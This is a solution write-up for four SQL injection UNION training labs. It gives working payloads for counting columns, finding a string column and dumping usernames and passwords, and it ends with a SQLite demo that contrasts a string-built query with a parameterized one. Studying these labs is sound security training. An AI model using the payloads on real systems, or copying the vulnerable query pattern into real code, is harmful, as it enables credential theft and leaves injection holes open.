Lab 1: SQL injection UNION attack, determining the number of columns returned by the query

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

To solve the lab, determine the number of columns returned by the query by performing an SQL injection UNION attack that returns an additional row containing null values.

Solution

  1. Recon
    Note that adding a single quote (') after the category parameter causes an internal server error.

  2. Solution
    By adding 'UNION SELECT NULL-- after the category parameter, the injected SELECT is combined with the original query through UNION. To find the number of columns, the number of NULL values in the injected SELECT must match the number of columns returned by the original query; the error persists until it does. In this lab example, the answer is:
    %27+UNION+SELECT%20NULL,NULL,NULL--

Lab 2: SQL injection UNION attack, determining the number of columns returned by the query

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.

The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

Solution

  1. Recon
    The number of columns is the same as the previous lab example.

  2. Solution
    By adding 'UNION SELECT NULL-- after the category parameter, the injected SELECT is again combined with the original query through UNION. To find the data type of a column, replace one of the NULL placeholders with a value of the candidate type. In this lab example, we need a string type, so we replace the NULL at each position in turn with 'abc'. The answer is:
    %27+UNION+SELECT%20NULL,'abc',NULL--

Lab 3: SQL injection UNION attack, retrieving data from other tables

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

  1. Recon
    The query returns two columns.

  2. Solution
    Since the table and column names are given in this case, the solution is relatively simple.
    The answer is:
    %27+UNION+SELECT%20username,password%20from%20users--

Lab 4: SQL injection UNION attack, retrieving data from other tables

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

  1. Recon
    The query returns two columns, and the users table also has two columns, username and password.

  2. Solution
    The solution from the previous example does not work. To handle a relatively more complex injection, I use Burp for this lab.

To check which column contains string:
%27UNION%20select%20NULL,%20%27abc%27%20from%20users--

This means that the second column can be used to display string output from the users table. Now we can retrieve usernames and passwords together, concatenated with the || string operator into that single column, through:
%27UNION%20select%20NULL,%20username||password%20from%20users--

One row of the output is administratorjhyvi4dz93yjnxxwjjnt, the administrator username immediately followed by the password, which is the solution here.
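As an added illustration that is not part of the original lab write-up, the script below stands in for the product category filter of Labs 1 to 4 using an in-memory SQLite database: the string-built query reproduces the column-count error and the UNION leak discussed above, while the parameterized version beside it treats the same input as nothing more than a category value. The table contents, product names and the users password are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the lab's products and users tables (sample data, not lab values).
SCHEMA = """
CREATE TABLE products (name TEXT, category TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO products VALUES ('Pencil', 'Gifts'), ('Mug', 'Gifts'), ('Cat food', 'Pets');
INSERT INTO users VALUES ('administrator', 'constructed-secret'), ('wiener', 'peter');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def filter_vulnerable(conn, category):
    # The lab's bug: the request parameter is pasted into the SQL text, so a quote
    # closes the literal and whatever follows (UNION SELECT ..., --) becomes SQL.
    sql = "SELECT name, category FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def filter_parameterized(conn, category):
    # Hardened form: the value is bound as a parameter and is never parsed as SQL,
    # so the same input simply matches no category.
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def probe(category):
    """Run both versions on one input and return (vulnerable_result, parameterized_result).
    Each result is the list of rows, or the string 'error' when SQLite rejects the SQL
    (the lab's 'internal server error', e.g. a column-count mismatch in the UNION)."""
    results = []
    for fn in (filter_vulnerable, filter_parameterized):
        conn = fresh_db()
        try:
            results.append(fn(conn, category))
        except sqlite3.OperationalError:
            results.append("error")
        finally:
            conn.close()
    return tuple(results)


if __name__ == "__main__":
    # URL-decoded forms of the inputs used in the labs above.
    for payload in ("Gifts", "Gifts'", "Gifts' UNION SELECT NULL--",
                    "Gifts' UNION SELECT NULL,NULL--",
                    "Gifts' UNION SELECT username||password, NULL FROM users--"):
        vuln, safe = probe(payload)
        print(f"{payload!r}\n  vulnerable: {vuln}\n  parameterized: {safe}")
```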